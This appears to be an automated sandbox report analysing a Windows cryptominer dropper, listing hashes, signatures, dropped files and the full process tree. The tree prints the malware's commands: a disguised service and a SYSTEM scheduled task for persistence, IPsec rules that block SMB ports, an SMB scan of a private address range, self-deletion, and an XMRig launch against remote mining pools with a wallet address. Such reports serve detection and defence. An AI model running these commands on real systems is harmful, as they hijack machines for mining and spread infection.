Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
07-05-2021 13:06
General
-
Target
aa.exe
-
Size
28.1MB
-
MD5
8d9d7f5babe3ee15f2e93a4321fa45cf
-
SHA1
689d53ae66e75e0b5715c0d04a7cab20e5390790
-
SHA256
c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee
-
SHA512
12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
XMRig Miner Payload 7 IoCs
-
Creates new service(s) 1 TTPs
-
Executes dropped EXE 4 IoCs
-
Deletes itself 1 IoCs
-
Loads dropped DLL 8 IoCs
-
Drops file in Windows directory 64 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\aa.exe"C:\Users\Admin\AppData\Local\Temp\aa.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\uuJCw\TJZPFV.exeC:\Windows\uuJCw\TJZPFV.exe2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\end.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=ipsec_ply4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=deny_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=allow_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=allow action=negotiate4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=ipsec_ply assign=y4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\end.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=ipsec_ply4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=deny_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=allow_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=allow action=negotiate4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=ipsec_ply assign=y4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\end.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=ipsec_ply4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=deny_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=allow_pt4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=allow action=negotiate4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=ipsec_ply assign=y4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\end.bat" "3⤵
-
C:\Windows\SysWOW64\sc.exesc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\uuJCw\qdx.bat" "3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\uuJCw\TJZPFV.exe" /SC ONSTART4⤵
- Creates scheduled task(s)
-
C:\Windows\uuJCw\Ys.exe"C:\Windows\uuJCw\Ys.exe" -o stratum+tcp://dns.monerogb.com:6502 -o stratum+tcp://note.monerogb.com:8666 -o stratum+tcp://wk.sdffdasdfsdfaczxfwd53.org:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\uuJCw\s.bat" "3⤵
- Loads dropped DLL
-
C:\Windows\uuJCw\svchost.exesvchost.exe syn 10.7.0.0 10.7.255.255 445 /save4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\uuJCw\s.bat" "3⤵
- Loads dropped DLL
-
C:\Windows\uuJCw\svchost.exesvchost.exe tcp 10.7.0.0 10.7.255.255 445 450 /save4⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\aa.exe"2⤵
- Deletes itself
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-734435346-39989641855249382-1063396119-2998157751948519609179847362-1302738693"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\end.batMD5
c017d5f762ae5d67efb7d099b53cca58
SHA1ab7f8553de7614251d76ce54aaee52f1a35e7ae6
SHA256d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b
SHA512856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78
-
C:\Windows\end.batMD5
c017d5f762ae5d67efb7d099b53cca58
SHA1ab7f8553de7614251d76ce54aaee52f1a35e7ae6
SHA256d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b
SHA512856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78
-
C:\Windows\uuJCw\TJZPFV.exeMD5
8d9d7f5babe3ee15f2e93a4321fa45cf
SHA1689d53ae66e75e0b5715c0d04a7cab20e5390790
SHA256c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee
SHA51212e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91
-
C:\Windows\uuJCw\TJZPFV.exeMD5
8d9d7f5babe3ee15f2e93a4321fa45cf
SHA1689d53ae66e75e0b5715c0d04a7cab20e5390790
SHA256c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee
SHA51212e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91
-
C:\Windows\uuJCw\Ys.exeMD5
90f9e1fdec81ccf508fc58f3d23156b5
SHA1066783e092007d2bcd10e2bbf412269fb9260d3f
SHA256d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018
SHA5128463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95
-
C:\Windows\uuJCw\qdx.batMD5
6e6a9139b684e136645639df74e75a4d
SHA1fafd5218df29e76c072ef9a3b07ca4a3644c6e56
SHA2569bc3a01fbc6452bac705925088c382fedf77735d7487a7def70ee8c2e13dcbf1
SHA512e3ac2e111b51e76c0eaeb1f93068be94c5544367529dcd843a03a029a25f840841e17bc99cb6dfd2b2f9ffa1bee7e1c2527cbf3a226a3c52a0853b0150f5886e
-
C:\Windows\uuJCw\s.batMD5
b8cacebcbb7894a1de059fe140de994b
SHA109de54c289a3686c08592e3bf452c87c4e293cca
SHA256a34520d5c0b68882195b432a9569322afd106b88873388580e0fc19e4e8c2f4b
SHA5122cbe04a3d80c9f1ffc85e5208f1ee475b29d3f21de41577dbd048ec27325b86e3ccf4f350634cf9119932353a570056d737b349abfcf35afe449982b2b2e9e35
-
C:\Windows\uuJCw\s.batMD5
9a4d0d81da0d64cacc5309ed15e8279c
SHA17cbdfda92416904d615ebcee72069b747d7660b9
SHA256ae9ad8ef7ec8cc2fb24110be8955dacb57b0cf2d7970d7975b7b471065e169e8
SHA512e47720421bed83755ba0e28dfd503a08c14ec02ee15b897391fab74491ef5d3ec7b675fdf0c29e4230c8251a4a582335e3be6e2325f1f20fc58c0a6bc52c7115
-
C:\Windows\uuJCw\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\uuJCw\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\uuJCw\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\uuJCw\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
C:\Windows\uuJCw\tscl.htmlMD5
a6dacfa9348a440ca548521adb203fc8
SHA130fbc2dc87c76aa9fafe50bffee4b75b409848bf
SHA2561a017f645e6b058cffbd4e75e745915bd30d78b58bf7cae18efd654f53613b93
SHA512e2b8b0c3f3157a4df70efc4ec444e039b03f3041d697e8b600487df35b428c2467c0ccc132c4cc6b2accb9734dd948c701a468415b12a11dda8aacfa7a9ab08c
-
\Windows\uuJCw\TJZPFV.exeMD5
8d9d7f5babe3ee15f2e93a4321fa45cf
SHA1689d53ae66e75e0b5715c0d04a7cab20e5390790
SHA256c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee
SHA51212e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91
-
\Windows\uuJCw\TJZPFV.exeMD5
8d9d7f5babe3ee15f2e93a4321fa45cf
SHA1689d53ae66e75e0b5715c0d04a7cab20e5390790
SHA256c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee
SHA51212e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91
-
\Windows\uuJCw\Ys.exeMD5
90f9e1fdec81ccf508fc58f3d23156b5
SHA1066783e092007d2bcd10e2bbf412269fb9260d3f
SHA256d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018
SHA5128463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95
-
\Windows\uuJCw\Ys.exeMD5
90f9e1fdec81ccf508fc58f3d23156b5
SHA1066783e092007d2bcd10e2bbf412269fb9260d3f
SHA256d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018
SHA5128463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95
-
\Windows\uuJCw\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
\Windows\uuJCw\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
\Windows\uuJCw\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
\Windows\uuJCw\svchost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
memory/268-100-0x0000000000000000-mapping.dmp
-
memory/272-69-0x0000000000000000-mapping.dmp
-
memory/292-82-0x0000000000000000-mapping.dmp
-
memory/328-80-0x0000000000000000-mapping.dmp
-
memory/336-79-0x0000000000000000-mapping.dmp
-
memory/360-134-0x0000000000000000-mapping.dmp
-
memory/528-122-0x0000000000000000-mapping.dmp
-
memory/844-130-0x0000000000000000-mapping.dmp
-
memory/876-124-0x0000000000000000-mapping.dmp
-
memory/968-106-0x0000000000000000-mapping.dmp
-
memory/968-88-0x0000000000000000-mapping.dmp
-
memory/1104-67-0x0000000000000000-mapping.dmp
-
memory/1272-110-0x0000000000000000-mapping.dmp
-
memory/1296-94-0x0000000000000000-mapping.dmp
-
memory/1296-75-0x0000000000000000-mapping.dmp
-
memory/1304-127-0x0000000000000000-mapping.dmp
-
memory/1328-90-0x0000000000000000-mapping.dmp
-
memory/1372-108-0x0000000000000000-mapping.dmp
-
memory/1392-114-0x0000000000000000-mapping.dmp
-
memory/1392-71-0x0000000000000000-mapping.dmp
-
memory/1588-73-0x0000000000000000-mapping.dmp
-
memory/1592-112-0x0000000000000000-mapping.dmp
-
memory/1592-83-0x0000000000000000-mapping.dmp
-
memory/1608-86-0x0000000000000000-mapping.dmp
-
memory/1620-144-0x00000000026A0000-0x00000000026C0000-memory.dmpFilesize
128KB
-
memory/1620-143-0x0000000002680000-0x00000000026A0000-memory.dmpFilesize
128KB
-
memory/1620-142-0x0000000000290000-0x00000000002A4000-memory.dmpFilesize
80KB
-
memory/1620-139-0x0000000000000000-mapping.dmp
-
memory/1624-77-0x0000000000000000-mapping.dmp
-
memory/1624-98-0x0000000000000000-mapping.dmp
-
memory/1628-117-0x0000000000000000-mapping.dmp
-
memory/1632-92-0x0000000000000000-mapping.dmp
-
memory/1704-120-0x0000000000000000-mapping.dmp
-
memory/1724-66-0x0000000000000000-mapping.dmp
-
memory/1736-101-0x0000000000000000-mapping.dmp
-
memory/1736-132-0x0000000000000000-mapping.dmp
-
memory/1748-126-0x0000000000000000-mapping.dmp
-
memory/1752-104-0x0000000000000000-mapping.dmp
-
memory/1772-62-0x0000000000000000-mapping.dmp
-
memory/1836-96-0x0000000000000000-mapping.dmp
-
memory/1888-136-0x0000000000000000-mapping.dmp
-
memory/1996-59-0x0000000075D41000-0x0000000075D43000-memory.dmpFilesize
8KB
-
memory/2036-116-0x0000000000000000-mapping.dmp
-
memory/2036-133-0x0000000000000000-mapping.dmp
-
memory/2084-145-0x0000000000000000-mapping.dmp
-
memory/2116-150-0x0000000000000000-mapping.dmp
-
memory/2156-152-0x0000000000000000-mapping.dmp
-
memory/2192-157-0x0000000000000000-mapping.dmp